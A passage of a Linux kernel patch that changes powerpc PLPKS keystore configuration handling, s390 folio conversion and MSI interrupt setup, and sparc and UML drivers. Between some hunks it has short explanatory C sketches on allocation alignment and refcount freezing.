+ static u8 *ospassword;
+ static u16 ospasswordlength;
+ 
+ // Retrieved with H_PKS_GET_CONFIG
++static u8 version;
++static u16 objoverhead;
+ static u16 maxpwsize;
+ static u16 maxobjsize;
++static s16 maxobjlabelsize;
++static u32 totalsize;
++static u32 usedspace;
++static u32 supportedpolicies;
++static u32 maxlargeobjectsize;
++static u64 signedupdatealgorithms;
+ 
+ struct plpks_auth {
+ 	u8 version;
+@@ -113,7 +121,8 @@ static int plpks_gen_password(void)
+ 	u8 *password, consumer = PLPKS_OS_OWNER;
+ 	int rc;
+ 
+-	password = kzalloc(maxpwsize, GFP_KERNEL);
++	// The password must not cross a page boundary, so we align to the next power of 2
++	password = kzalloc(roundup_pow_of_two(maxpwsize), GFP_KERNEL);
+ 	if (!password)
+ 		return -ENOMEM;
+ 
+@@ -149,7 +158,9 @@ static struct plpks_auth *construct_auth(u8 consumer)
+ 	if (consumer > PLPKS_OS_OWNER)
+ 		return ERR_PTR(-EINVAL);
+ 
+-	auth = kzalloc(struct_size(auth, password, maxpwsize), GFP_KERNEL);
++	// The auth structure must not cross a page boundary and must be
++	// 16 byte aligned. We align to the next largest power of 2
++	auth = kzalloc(roundup_pow_of_two(struct_size(auth, password, maxpwsize)), GFP_KERNEL);
+ 	if (!auth)
+ 		return ERR_PTR(-ENOMEM);
+ 
+@@ -183,7 +194,8 @@ static struct label *construct_label(char *component, u8 varos, u8 *name,
+ 	if (component && slen > sizeof(label->attr.prefix))
+ 		return ERR_PTR(-EINVAL);
+ 
+-	label = kzalloc(sizeof(*label), GFP_KERNEL);
++	// The label structure must not cross a page boundary, so we align to the next power of 2
++	label = kzalloc(roundup_pow_of_two(sizeof(*label)), GFP_KERNEL);
+ 	if (!label)
+ 		return ERR_PTR(-ENOMEM);
+ 
+@@ -203,32 +215,157 @@ static struct label *construct_label(char *component, u8 varos, u8 *name,
+ static int _plpks_get_config(void)
+ {
+ 	unsigned long retbuf[PLPAR_HCALL_BUFSIZE] = { 0 };
+-	struct {
++	struct config {
+ 		u8 version;
+ 		u8 flags;
+-		__be32 rsvd0;
++		__be16 rsvd0;
++		__be16 objoverhead;
+ 		__be16 maxpwsize;
+ 		__be16 maxobjlabelsize;
+ 		__be16 maxobjsize;
+ 		__be32 totalsize;
+ 		__be32 usedspace;
+ 		__be32 supportedpolicies;
+-		__be64 rsvd1;
+-	} __packed config;
++		__be32 maxlargeobjectsize;
++		__be64 signedupdatealgorithms;
++		u8 rsvd1[476];
++	} __packed * config;
+ 	size_t size;
+-	int rc;
++	int rc = 0;
++
++	size = sizeof(*config);
++
++	// Config struct must not cross a page boundary. So long as the struct
++	// size is a power of 2, this should be fine as alignment is guaranteed
++	config = kzalloc(size, GFP_KERNEL);
++	if (!config) {
++		rc = -ENOMEM;
++		goto err;
++	}
++
++	rc = plpar_hcall(H_PKS_GET_CONFIG, retbuf, virt_to_phys(config), size);
++
++	if (rc != H_SUCCESS) {
++		rc = pseries_status_to_err(rc);
++		goto err;
++	}
++
++	version = config->version;
++	objoverhead = be16_to_cpu(config->objoverhead);
++	maxpwsize = be16_to_cpu(config->maxpwsize);
++	maxobjsize = be16_to_cpu(config->maxobjsize);
++	maxobjlabelsize = be16_to_cpu(config->maxobjlabelsize);
++	totalsize = be32_to_cpu(config->totalsize);
++	usedspace = be32_to_cpu(config->usedspace);
++	supportedpolicies = be32_to_cpu(config->supportedpolicies);
++	maxlargeobjectsize = be32_to_cpu(config->maxlargeobjectsize);
++	signedupdatealgorithms = be64_to_cpu(config->signedupdatealgorithms);
++
++	// Validate that the numbers we get back match the requirements of the spec
++	if (maxpwsize < 32) {
++		pr_err("Invalid Max Password Size received from hypervisor (%d < 32)\n", maxpwsize);
++		rc = -EIO;
++		goto err;
++	}
++
++	if (maxobjlabelsize < 255) {
++		pr_err("Invalid Max Object Label Size received from hypervisor (%d < 255)\n",
++		       maxobjlabelsize);
++		rc = -EIO;
++		goto err;
++	}
++
++	if (totalsize < 4096) {
++		pr_err("Invalid Total Size received from hypervisor (%d < 4096)\n", totalsize);
++		rc = -EIO;
++		goto err;
++	}
++
++	if (version >= 3 && maxlargeobjectsize >= 65536 && maxobjsize != 0xFFFF) {
++		pr_err("Invalid Max Object Size (0x%x != 0xFFFF)\n", maxobjsize);
++		rc = -EIO;
++		goto err;
++	}
++
++err:
++	kfree(config);
++	return rc;
++}
++
++u8 plpks_get_version(void)
++{
++	return version;
++}
++
++u16 plpks_get_objoverhead(void)
++{
++	return objoverhead;
++}
++
++u16 plpks_get_maxpwsize(void)
++{
++	return maxpwsize;
++}
++
++u16 plpks_get_maxobjectsize(void)
++{
++	return maxobjsize;
++}
++
++u16 plpks_get_maxobjectlabelsize(void)
++{
++	return maxobjlabelsize;
++}
++
++u32 plpks_get_totalsize(void)
++{
++	return totalsize;
++}
++
++u32 plpks_get_usedspace(void)
++{
++	// Unlike other config values, usedspace regularly changes as objects
++	// are updated, so we need to refresh.
++	int rc = _plpks_get_config();
++	if (rc) {
++		pr_err("Couldn't get config, rc: %d\n", rc);
++		return 0;
++	}
++	return usedspace;
++}
+ 
+-	size = sizeof(config);
++u32 plpks_get_supportedpolicies(void)
++{
++	return supportedpolicies;
++}
+ 
+-	rc = plpar_hcall(H_PKS_GET_CONFIG, retbuf, virt_to_phys(&config), size);
++u32 plpks_get_maxlargeobjectsize(void)
++{
++	return maxlargeobjectsize;
++}
+ 
+-	if (rc != H_SUCCESS)
+-		return pseries_status_to_err(rc);
++u64 plpks_get_signedupdatealgorithms(void)
++{
++	return signedupdatealgorithms;
++}
+ 
+-	maxpwsize = be16_to_cpu(config.maxpwsize);
+-	maxobjsize = be16_to_cpu(config.maxobjsize);
++u16 plpks_get_passwordlen(void)
++{
++	return ospasswordlength;
++}
++
++bool plpks_is_available(void)
++{
++	int rc;
++
++	if (!firmware_has_feature(FW_FEATURE_LPAR))
++		return false;
++
++	rc = _plpks_get_config();
++	if (rc)
++		return false;
+ 
+-	return 0;
++	return true;
+ }
+ 
+ static int plpks_confirm_object_flushed(struct label *label,
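
All three roundup_pow_of_two() call sites above lean on the same property: the slab allocator naturally aligns power-of-two-sized allocations, and a block aligned to its own size (up to PAGE_SIZE) cannot straddle a page boundary. A userspace sketch of that invariant, with aligned_alloc() standing in for kzalloc()'s alignment guarantee:

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

#define PAGE_SIZE 4096UL

/* Userspace stand-in for the kernel helper of the same name. */
static size_t roundup_pow_of_two(size_t n)
{
        size_t p = 1;

        while (p < n)
                p <<= 1;
        return p;
}

static int crosses_page(uintptr_t addr, size_t len)
{
        return (addr / PAGE_SIZE) != ((addr + len - 1) / PAGE_SIZE);
}

int main(void)
{
        size_t want = 600;                      /* e.g. maxpwsize */
        size_t size = roundup_pow_of_two(want); /* 1024 */
        /* aligned_alloc models the slab's natural alignment for
         * power-of-two sizes. */
        void *buf = aligned_alloc(size, size);

        printf("size=%zu crosses page: %d\n", size,
               crosses_page((uintptr_t)buf, size));
        free(buf);
        return 0;
}
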
+diff --git a/arch/powerpc/platforms/pseries/plpks.h b/arch/powerpc/platforms/pseries/plpks.h
+deleted file mode 100644
+index 07278a990c2df..0000000000000
+--- a/arch/powerpc/platforms/pseries/plpks.h
++++ /dev/null
+@@ -1,96 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- * Copyright (C) 2022 IBM Corporation
+- * Author: Nayna Jain <nayna@linux.ibm.com>
+- *
+- * Platform keystore for pseries LPAR(PLPKS).
+- */
+-
+-#ifndef _PSERIES_PLPKS_H
+-#define _PSERIES_PLPKS_H
+-
+-#include <linux/types.h>
+-#include <linux/list.h>
+-
+-// Object policy flags from supported_policies
+-#define PLPKS_OSSECBOOTAUDIT	PPC_BIT32(1) // OS secure boot must be audit/enforce
+-#define PLPKS_OSSECBOOTENFORCE	PPC_BIT32(2) // OS secure boot must be enforce
+-#define PLPKS_PWSET		PPC_BIT32(3) // No access without password set
+-#define PLPKS_WORLDREADABLE	PPC_BIT32(4) // Readable without authentication
+-#define PLPKS_IMMUTABLE		PPC_BIT32(5) // Once written, object cannot be removed
+-#define PLPKS_TRANSIENT		PPC_BIT32(6) // Object does not persist through reboot
+-#define PLPKS_SIGNEDUPDATE	PPC_BIT32(7) // Object can only be modified by signed updates
+-#define PLPKS_HVPROVISIONED	PPC_BIT32(28) // Hypervisor has provisioned this object
+-
+-// Signature algorithm flags from signed_update_algorithms
+-#define PLPKS_ALG_RSA2048	PPC_BIT(0)
+-#define PLPKS_ALG_RSA4096	PPC_BIT(1)
+-
+-// Object label OS metadata flags
+-#define PLPKS_VAR_LINUX		0x02
+-#define PLPKS_VAR_COMMON	0x04
+-
+-// Flags for which consumer owns an object is owned by
+-#define PLPKS_FW_OWNER			0x1
+-#define PLPKS_BOOTLOADER_OWNER		0x2
+-#define PLPKS_OS_OWNER			0x3
+-
+-// Flags for label metadata fields
+-#define PLPKS_LABEL_VERSION		0
+-#define PLPKS_MAX_LABEL_ATTR_SIZE	16
+-#define PLPKS_MAX_NAME_SIZE		239
+-#define PLPKS_MAX_DATA_SIZE		4000
+-
+-// Timeouts for PLPKS operations
+-#define PLPKS_MAX_TIMEOUT		(5 * USEC_PER_SEC)
+-#define PLPKS_FLUSH_SLEEP		10000 // usec
+-
+-struct plpks_var {
+-	char *component;
+-	u8 *name;
+-	u8 *data;
+-	u32 policy;
+-	u16 namelen;
+-	u16 datalen;
+-	u8 os;
+-};
+-
+-struct plpks_var_name {
+-	u8  *name;
+-	u16 namelen;
+-};
+-
+-struct plpks_var_name_list {
+-	u32 varcount;
+-	struct plpks_var_name varlist[];
+-};
+-
+-/**
+- * Writes the specified var and its data to PKS.
+- * Any caller of PKS driver should present a valid component type for
+- * their variable.
+- */
+-int plpks_write_var(struct plpks_var var);
+-
+-/**
+- * Removes the specified var and its data from PKS.
+- */
+-int plpks_remove_var(char *component, u8 varos,
+-		     struct plpks_var_name vname);
+-
+-/**
+- * Returns the data for the specified os variable.
+- */
+-int plpks_read_os_var(struct plpks_var *var);
+-
+-/**
+- * Returns the data for the specified firmware variable.
+- */
+-int plpks_read_fw_var(struct plpks_var *var);
+-
+-/**
+- * Returns the data for the specified bootloader variable.
+- */
+-int plpks_read_bootloader_var(struct plpks_var *var);
+-
+-#endif
+diff --git a/arch/powerpc/xmon/ppc-dis.c b/arch/powerpc/xmon/ppc-dis.c
+index 75fa98221d485..af105e1bc3fca 100644
+--- a/arch/powerpc/xmon/ppc-dis.c
++++ b/arch/powerpc/xmon/ppc-dis.c
+@@ -122,32 +122,21 @@ int print_insn_powerpc (unsigned long insn, unsigned long memaddr)
+   bool insn_is_short;
+   ppc_cpu_t dialect;
+ 
+-  dialect = PPC_OPCODE_PPC | PPC_OPCODE_COMMON
+-            | PPC_OPCODE_64 | PPC_OPCODE_POWER4 | PPC_OPCODE_ALTIVEC;
++  dialect = PPC_OPCODE_PPC | PPC_OPCODE_COMMON;
+ 
+-  if (cpu_has_feature(CPU_FTRS_POWER5))
+-    dialect |= PPC_OPCODE_POWER5;
++  if (IS_ENABLED(CONFIG_PPC64))
++    dialect |= PPC_OPCODE_64 | PPC_OPCODE_POWER4 | PPC_OPCODE_CELL |
++	PPC_OPCODE_POWER5 | PPC_OPCODE_POWER6 | PPC_OPCODE_POWER7 | PPC_OPCODE_POWER8 |
++	PPC_OPCODE_POWER9;
+ 
+-  if (cpu_has_feature(CPU_FTRS_CELL))
+-    dialect |= (PPC_OPCODE_CELL | PPC_OPCODE_ALTIVEC);
++  if (cpu_has_feature(CPU_FTR_TM))
++    dialect |= PPC_OPCODE_HTM;
+ 
+-  if (cpu_has_feature(CPU_FTRS_POWER6))
+-    dialect |= (PPC_OPCODE_POWER5 | PPC_OPCODE_POWER6 | PPC_OPCODE_ALTIVEC);
++  if (cpu_has_feature(CPU_FTR_ALTIVEC))
++    dialect |= PPC_OPCODE_ALTIVEC | PPC_OPCODE_ALTIVEC2;
+ 
+-  if (cpu_has_feature(CPU_FTRS_POWER7))
+-    dialect |= (PPC_OPCODE_POWER5 | PPC_OPCODE_POWER6 | PPC_OPCODE_POWER7
+-                | PPC_OPCODE_ALTIVEC | PPC_OPCODE_VSX);
+-
+-  if (cpu_has_feature(CPU_FTRS_POWER8))
+-    dialect |= (PPC_OPCODE_POWER5 | PPC_OPCODE_POWER6 | PPC_OPCODE_POWER7
+-		| PPC_OPCODE_POWER8 | PPC_OPCODE_HTM
+-		| PPC_OPCODE_ALTIVEC | PPC_OPCODE_ALTIVEC2 | PPC_OPCODE_VSX);
+-
+-  if (cpu_has_feature(CPU_FTRS_POWER9))
+-    dialect |= (PPC_OPCODE_POWER5 | PPC_OPCODE_POWER6 | PPC_OPCODE_POWER7
+-		| PPC_OPCODE_POWER8 | PPC_OPCODE_POWER9 | PPC_OPCODE_HTM
+-		| PPC_OPCODE_ALTIVEC | PPC_OPCODE_ALTIVEC2
+-		| PPC_OPCODE_VSX | PPC_OPCODE_VSX3);
++  if (cpu_has_feature(CPU_FTR_VSX))
++    dialect |= PPC_OPCODE_VSX | PPC_OPCODE_VSX3;
+ 
+   /* Get the major opcode of the insn.  */
+   opcode = NULL;
+diff --git a/arch/s390/kernel/uv.c b/arch/s390/kernel/uv.c
+index 5caa0ed2b594a..1ae7a04038049 100644
+--- a/arch/s390/kernel/uv.c
++++ b/arch/s390/kernel/uv.c
+@@ -172,36 +172,36 @@ int uv_convert_owned_from_secure(unsigned long paddr)
+ }
+ 
+ /*
+- * Calculate the expected ref_count for a page that would otherwise have no
++ * Calculate the expected ref_count for a folio that would otherwise have no
+  * further pins. This was cribbed from similar functions in other places in
+  * the kernel, but with some slight modifications. We know that a secure
+- * page can not be a huge page for example.
++ * folio can not be a large folio, for example.
+  */
+-static int expected_page_refs(struct page *page)
++static int expected_folio_refs(struct folio *folio)
+ {
+ 	int res;
+ 
+-	res = page_mapcount(page);
+-	if (PageSwapCache(page)) {
++	res = folio_mapcount(folio);
++	if (folio_test_swapcache(folio)) {
+ 		res++;
+-	} else if (page_mapping(page)) {
++	} else if (folio_mapping(folio)) {
+ 		res++;
+-		if (page_has_private(page))
++		if (folio->private)
+ 			res++;
+ 	}
+ 	return res;
+ }
+ 
+-static int make_page_secure(struct page *page, struct uv_cb_header *uvcb)
++static int make_folio_secure(struct folio *folio, struct uv_cb_header *uvcb)
+ {
+ 	int expected, cc = 0;
+ 
+-	if (PageWriteback(page))
++	if (folio_test_writeback(folio))
+ 		return -EAGAIN;
+-	expected = expected_page_refs(page);
+-	if (!page_ref_freeze(page, expected))
++	expected = expected_folio_refs(folio);
++	if (!folio_ref_freeze(folio, expected))
+ 		return -EBUSY;
+-	set_bit(PG_arch_1, &page->flags);
++	set_bit(PG_arch_1, &folio->flags);
+ 	/*
+ 	 * If the UVC does not succeed or fail immediately, we don't want to
+ 	 * loop for long, or we might get stall notifications.
+@@ -211,9 +211,9 @@ static int make_page_secure(struct page *page, struct uv_cb_header *uvcb)
+ 	 * -EAGAIN and we let the callers deal with it.
+ 	 */
+ 	cc = __uv_call(0, (u64)uvcb);
+-	page_ref_unfreeze(page, expected);
++	folio_ref_unfreeze(folio, expected);
+ 	/*
+-	 * Return -ENXIO if the page was not mapped, -EINVAL for other errors.
++	 * Return -ENXIO if the folio was not mapped, -EINVAL for other errors.
+ 	 * If busy or partially completed, return -EAGAIN.
+ 	 */
+ 	if (cc == UVC_CC_OK)
+@@ -261,7 +261,7 @@ int gmap_make_secure(struct gmap *gmap, unsigned long gaddr, void *uvcb)
+ 	bool local_drain = false;
+ 	spinlock_t *ptelock;
+ 	unsigned long uaddr;
+-	struct page *page;
++	struct folio *folio;
+ 	pte_t *ptep;
+ 	int rc;
+ 
+@@ -288,15 +288,26 @@ int gmap_make_secure(struct gmap *gmap, unsigned long gaddr, void *uvcb)
+ 	rc = -ENXIO;
+ 	ptep = get_locked_pte(gmap->mm, uaddr, &ptelock);
+ 	if (pte_present(*ptep) && !(pte_val(*ptep) & _PAGE_INVALID) && pte_write(*ptep)) {
+-		page = pte_page(*ptep);
++		folio = page_folio(pte_page(*ptep));
++		rc = -EINVAL;
++		if (folio_test_large(folio))
++			goto unlock;
+ 		rc = -EAGAIN;
+-		if (trylock_page(page)) {
++		if (folio_trylock(folio)) {
+ 			if (should_export_before_import(uvcb, gmap->mm))
+-				uv_convert_from_secure(page_to_phys(page));
+-			rc = make_page_secure(page, uvcb);
+-			unlock_page(page);
++				uv_convert_from_secure(PFN_PHYS(folio_pfn(folio)));
++			rc = make_folio_secure(folio, uvcb);
++			folio_unlock(folio);
+ 		}
++
++		/*
++		 * Once we drop the PTL, the folio may get unmapped and
++		 * freed immediately. We need a temporary reference.
++		 */
++		if (rc == -EAGAIN)
++			folio_get(folio);
+ 	}
++unlock:
+ 	pte_unmap_unlock(ptep, ptelock);
+ out:
+ 	mmap_read_unlock(gmap->mm);
+@@ -306,10 +317,11 @@ int gmap_make_secure(struct gmap *gmap, unsigned long gaddr, void *uvcb)
+ 		 * If we are here because the UVC returned busy or partial
+ 		 * completion, this is just a useless check, but it is safe.
+ 		 */
+-		wait_on_page_writeback(page);
++		folio_wait_writeback(folio);
++		folio_put(folio);
+ 	} else if (rc == -EBUSY) {
+ 		/*
+-		 * If we have tried a local drain and the page refcount
++		 * If we have tried a local drain and the folio refcount
+ 		 * still does not match our expected safe value, try with a
+ 		 * system wide drain. This is needed if the pagevecs holding
+ 		 * the page are on a different CPU.
+@@ -320,7 +332,7 @@ int gmap_make_secure(struct gmap *gmap, unsigned long gaddr, void *uvcb)
+ 			return -EAGAIN;
+ 		}
+ 		/*
+-		 * We are here if the page refcount does not match the
++		 * We are here if the folio refcount does not match the
+ 		 * expected safe value. The main culprits are usually
+ 		 * pagevecs. With lru_add_drain() we drain the pagevecs
+ 		 * on the local CPU so that hopefully the refcount will
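
make_folio_secure() depends on folio_ref_freeze(), which atomically swaps the refcount to zero only if it still equals the computed number of safe references; any concurrent extra reference makes the freeze fail and the caller returns -EBUSY. A userspace model of that primitive using C11 atomics (ref_freeze()/ref_unfreeze() are stand-ins, not kernel API):

#include <stdatomic.h>
#include <stdbool.h>
#include <stdio.h>

/* The count is atomically swapped to 0 only if it still equals
 * the expected number of "safe" references. */
static bool ref_freeze(atomic_int *ref, int expected)
{
        return atomic_compare_exchange_strong(ref, &expected, 0);
}

static void ref_unfreeze(atomic_int *ref, int count)
{
        atomic_store(ref, count);
}

int main(void)
{
        atomic_int ref = 3;

        if (ref_freeze(&ref, 3)) {      /* no hidden references */
                /* ... issue the UV call while frozen ... */
                ref_unfreeze(&ref, 3);
                puts("frozen and restored");
        } else {
                puts("-EBUSY: extra reference present");
        }
        return 0;
}
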
+diff --git a/arch/s390/pci/pci_irq.c b/arch/s390/pci/pci_irq.c
+index 04c19ab93a329..393bcc2c3dc2b 100644
+--- a/arch/s390/pci/pci_irq.c
++++ b/arch/s390/pci/pci_irq.c
+@@ -268,33 +268,20 @@ static void zpci_floating_irq_handler(struct airq_struct *airq,
+ 	}
+ }
+ 
+-int arch_setup_msi_irqs(struct pci_dev *pdev, int nvec, int type)
++static int __alloc_airq(struct zpci_dev *zdev, int msi_vecs,
++			unsigned long *bit)
+ {
+-	struct zpci_dev *zdev = to_zpci(pdev);
+-	unsigned int hwirq, msi_vecs, cpu;
+-	unsigned long bit;
+-	struct msi_desc *msi;
+-	struct msi_msg msg;
+-	int cpu_addr;
+-	int rc, irq;
+-
+-	zdev->aisb = -1UL;
+-	zdev->msi_first_bit = -1U;
+-	if (type == PCI_CAP_ID_MSI && nvec > 1)
+-		return 1;
+-	msi_vecs = min_t(unsigned int, nvec, zdev->max_msi);
+-
+ 	if (irq_delivery == DIRECTED) {
+ 		/* Allocate cpu vector bits */
+-		bit = airq_iv_alloc(zpci_ibv[0], msi_vecs);
+-		if (bit == -1UL)
++		*bit = airq_iv_alloc(zpci_ibv[0], msi_vecs);
++		if (*bit == -1UL)
+ 			return -EIO;
+ 	} else {
+ 		/* Allocate adapter summary indicator bit */
+-		bit = airq_iv_alloc_bit(zpci_sbv);
+-		if (bit == -1UL)
++		*bit = airq_iv_alloc_bit(zpci_sbv);
++		if (*bit == -1UL)
+ 			return -EIO;
+-		zdev->aisb = bit;
++		zdev->aisb = *bit;
+ 
+ 		/* Create adapter interrupt vector */
+ 		zdev->aibv = airq_iv_create(msi_vecs, AIRQ_IV_DATA | AIRQ_IV_BITLOCK, NULL);
+@@ -302,27 +289,66 @@ int arch_setup_msi_irqs(struct pci_dev *pdev, int nvec, int type)
+ 			return -ENOMEM;
+ 
+ 		/* Wire up shortcut pointer */
+-		zpci_ibv[bit] = zdev->aibv;
++		zpci_ibv[*bit] = zdev->aibv;
+ 		/* Each function has its own interrupt vector */
+-		bit = 0;
++		*bit = 0;
+ 	}
++	return 0;
++}
+ 
+-	/* Request MSI interrupts */
++int arch_setup_msi_irqs(struct pci_dev *pdev, int nvec, int type)
++{
++	unsigned int hwirq, msi_vecs, irqs_per_msi, i, cpu;
++	struct zpci_dev *zdev = to_zpci(pdev);
++	struct msi_desc *msi;
++	struct msi_msg msg;
++	unsigned long bit;
++	int cpu_addr;
++	int rc, irq;
++
++	zdev->aisb = -1UL;
++	zdev->msi_first_bit = -1U;
++
++	msi_vecs = min_t(unsigned int, nvec, zdev->max_msi);
++	if (msi_vecs < nvec) {
++		pr_info("%s requested %d irqs, allocate system limit of %d",
++			pci_name(pdev), nvec, zdev->max_msi);
++	}
++
++	rc = __alloc_airq(zdev, msi_vecs, &bit);
++	if (rc < 0)
++		return rc;
++
++	/*
++	 * Request MSI interrupts:
++	 * When using MSI, nvec_used interrupt sources and their irq
++	 * descriptors are controlled through one msi descriptor.
++	 * Thus the outer loop over msi descriptors shall run only once,
++	 * while two inner loops iterate over the interrupt vectors.
++	 * When using MSI-X, each interrupt vector/irq descriptor
++	 * is bound to exactly one msi descriptor (nvec_used is one).
++	 * So the inner loops are executed once, while the outer iterates
++	 * over the MSI-X descriptors.
++	 */
+ 	hwirq = bit;
+ 	msi_for_each_desc(msi, &pdev->dev, MSI_DESC_NOTASSOCIATED) {
+-		rc = -EIO;
+ 		if (hwirq - bit >= msi_vecs)
+ 			break;
+-		irq = __irq_alloc_descs(-1, 0, 1, 0, THIS_MODULE,
+-				(irq_delivery == DIRECTED) ?
+-				msi->affinity : NULL);
++		irqs_per_msi = min_t(unsigned int, msi_vecs, msi->nvec_used);
++		irq = __irq_alloc_descs(-1, 0, irqs_per_msi, 0, THIS_MODULE,
++					(irq_delivery == DIRECTED) ?
++					msi->affinity : NULL);
+ 		if (irq < 0)
+ 			return -ENOMEM;
+-		rc = irq_set_msi_desc(irq, msi);
+-		if (rc)
+-			return rc;
+-		irq_set_chip_and_handler(irq, &zpci_irq_chip,
+-					 handle_percpu_irq);
++
++		for (i = 0; i < irqs_per_msi; i++) {
++			rc = irq_set_msi_desc_off(irq, i, msi);
++			if (rc)
++				return rc;
++			irq_set_chip_and_handler(irq + i, &zpci_irq_chip,
++						 handle_percpu_irq);
++		}
++
+ 		msg.data = hwirq - bit;
+ 		if (irq_delivery == DIRECTED) {
+ 			if (msi->affinity)
+@@ -335,31 +361,35 @@ int arch_setup_msi_irqs(struct pci_dev *pdev, int nvec, int type)
+ 			msg.address_lo |= (cpu_addr << 8);
+ 
+ 			for_each_possible_cpu(cpu) {
+-				airq_iv_set_data(zpci_ibv[cpu], hwirq, irq);
++				for (i = 0; i < irqs_per_msi; i++)
++					airq_iv_set_data(zpci_ibv[cpu],
++							 hwirq + i, irq + i);
+ 			}
+ 		} else {
+ 			msg.address_lo = zdev->msi_addr & 0xffffffff;
+-			airq_iv_set_data(zdev->aibv, hwirq, irq);
++			for (i = 0; i < irqs_per_msi; i++)
++				airq_iv_set_data(zdev->aibv, hwirq + i, irq + i);
+ 		}
+ 		msg.address_hi = zdev->msi_addr >> 32;
+ 		pci_write_msi_msg(irq, &msg);
+-		hwirq++;
++		hwirq += irqs_per_msi;
+ 	}
+ 
+ 	zdev->msi_first_bit = bit;
+-	zdev->msi_nr_irqs = msi_vecs;
++	zdev->msi_nr_irqs = hwirq - bit;
+ 
+ 	rc = zpci_set_irq(zdev);
+ 	if (rc)
+ 		return rc;
+ 
+-	return (msi_vecs == nvec) ? 0 : msi_vecs;
++	return (zdev->msi_nr_irqs == nvec) ? 0 : zdev->msi_nr_irqs;
+ }
+ 
+ void arch_teardown_msi_irqs(struct pci_dev *pdev)
+ {
+ 	struct zpci_dev *zdev = to_zpci(pdev);
+ 	struct msi_desc *msi;
++	unsigned int i;
+ 	int rc;
+ 
+ 	/* Disable interrupts */
+@@ -369,8 +399,10 @@ void arch_teardown_msi_irqs(struct pci_dev *pdev)
+ 
+ 	/* Release MSI interrupts */
+ 	msi_for_each_desc(msi, &pdev->dev, MSI_DESC_ASSOCIATED) {
+-		irq_set_msi_desc(msi->irq, NULL);
+-		irq_free_desc(msi->irq);
++		for (i = 0; i < msi->nvec_used; i++) {
++			irq_set_msi_desc(msi->irq + i, NULL);
++			irq_free_desc(msi->irq + i);
++		}
+ 		msi->msg.address_lo = 0;
+ 		msi->msg.address_hi = 0;
+ 		msi->msg.data = 0;
+diff --git a/arch/sparc/include/asm/oplib_64.h b/arch/sparc/include/asm/oplib_64.h
+index a67abebd43592..1b86d02a84556 100644
+--- a/arch/sparc/include/asm/oplib_64.h
++++ b/arch/sparc/include/asm/oplib_64.h
+@@ -247,6 +247,7 @@ void prom_sun4v_guest_soft_state(void);
+ int prom_ihandle2path(int handle, char *buffer, int bufsize);
+ 
+ /* Client interface level routines. */
++void prom_cif_init(void *cif_handler);
+ void p1275_cmd_direct(unsigned long *);
+ 
+ #endif /* !(__SPARC64_OPLIB_H) */
+diff --git a/arch/sparc/prom/init_64.c b/arch/sparc/prom/init_64.c
+index 103aa91043185..f7b8a1a865b8f 100644
+--- a/arch/sparc/prom/init_64.c
++++ b/arch/sparc/prom/init_64.c
+@@ -26,9 +26,6 @@ phandle prom_chosen_node;
+  * routines in the prom library.
+  * It gets passed the pointer to the PROM vector.
+  */
+-
+-extern void prom_cif_init(void *);
+-
+ void __init prom_init(void *cif_handler)
+ {
+ 	phandle node;
+diff --git a/arch/sparc/prom/p1275.c b/arch/sparc/prom/p1275.c
+index 889aa602f8d86..51c3f984bbf72 100644
+--- a/arch/sparc/prom/p1275.c
++++ b/arch/sparc/prom/p1275.c
+@@ -49,7 +49,7 @@ void p1275_cmd_direct(unsigned long *args)
+ 	local_irq_restore(flags);
+ }
+ 
+-void prom_cif_init(void *cif_handler, void *cif_stack)
++void prom_cif_init(void *cif_handler)
+ {
+ 	p1275buf.prom_cif_handler = (void (*)(long *))cif_handler;
+ }
+diff --git a/arch/um/drivers/ubd_kern.c b/arch/um/drivers/ubd_kern.c
+index 13a22a4613051..1203f5078cb57 100644
+--- a/arch/um/drivers/ubd_kern.c
++++ b/arch/um/drivers/ubd_kern.c
+@@ -456,43 +456,31 @@ static int bulk_req_safe_read(
+ 	return n;
+ }
+ 
+-/* Called without dev->lock held, and only in interrupt context. */
+-static void ubd_handler(void)
++static void ubd_end_request(struct io_thread_req *io_req)
+ {
+-	int n;
+-	int count;
+-
+-	while(1){
+-		n = bulk_req_safe_read(
+-			thread_fd,
+-			irq_req_buffer,
+-			&irq_remainder,
+-			&irq_remainder_size,
+-			UBD_REQ_BUFFER_SIZE
+-		);
+-		if (n < 0) {
+-			if(n == -EAGAIN)
+-				break;
+-			printk(KERN_ERR "spurious interrupt in ubd_handler, "
+-			       "err = %d\n", -n);
+-			return;
+-		}
+-		for (count = 0; count < n/sizeof(struct io_thread_req *); count++) {
+-			struct io_thread_req *io_req = (*irq_req_buffer)[count];
+-
+-			if ((io_req->error == BLK_STS_NOTSUPP) && (req_op(io_req->req) == REQ_OP_DISCARD)) {
+-				blk_queue_max_discard_sectors(io_req->req->q, 0);
+-				blk_queue_max_write_zeroes_sectors(io_req->req->q, 0);
+-			}
+-			blk_mq_end_request(io_req->req, io_req->error);
+-			kfree(io_req);
+-		}
++	if (io_req->error == BLK_STS_NOTSUPP) {
++		if (req_op(io_req->req) == REQ_OP_DISCARD)
++			blk_queue_max_discard_sectors(io_req->req->q, 0);
++		else if (req_op(io_req->req) == REQ_OP_WRITE_ZEROES)
++			blk_queue_max_write_zeroes_sectors(io_req->req->q, 0);
+ 	}
++	blk_mq_end_request(io_req->req, io_req->error);
++	kfree(io_req);
+ }
+ 
+ static irqreturn_t ubd_intr(int irq, void *dev)
+ {
+-	ubd_handler();
++	int len, i;
++
++	while ((len = bulk_req_safe_read(thread_fd, irq_req_buffer,
++			&irq_remainder, &irq_remainder_size,
++			UBD_REQ_BUFFER_SIZE)) >= 0) {
++		for (i = 0; i < len / sizeof(struct io_thread_req *); i++)
++			ubd_end_request((*irq_req_buffer)[i]);
++	}
++
++	if (len < 0 && len != -EAGAIN)
++		pr_err("spurious interrupt in %s, err = %d\n", __func__, len);
+ 	return IRQ_HANDLED;
+ }
+ 
+diff --git a/arch/um/kernel/time.c b/arch/um/kernel/time.c
+index 3e270da6b6f67..c8c4ef94c753f 100644
+--- a/arch/um/kernel/time.c
++++ b/arch/um/kernel/time.c
+@@ -874,9 +874,9 @@ int setup_time_travel_start(char *str)
+ 	return 1;
+ }
+ 
+-__setup("time-travel-start", setup_time_travel_start);
++__setup("time-travel-start=", setup_time_travel_start);
+ __uml_help(setup_time_travel_start,
+-"time-travel-start=<seconds>\n"
++"time-travel-start=<nanoseconds>\n"
+ "Configure the UML instance's wall clock to start at this value rather than\n"
+ "the host's wall clock at the time of UML boot.\n");
+ #endif
+diff --git a/arch/um/os-Linux/signal.c b/arch/um/os-Linux/signal.c
+index 24a403a70a020..850d21e6473ee 100644
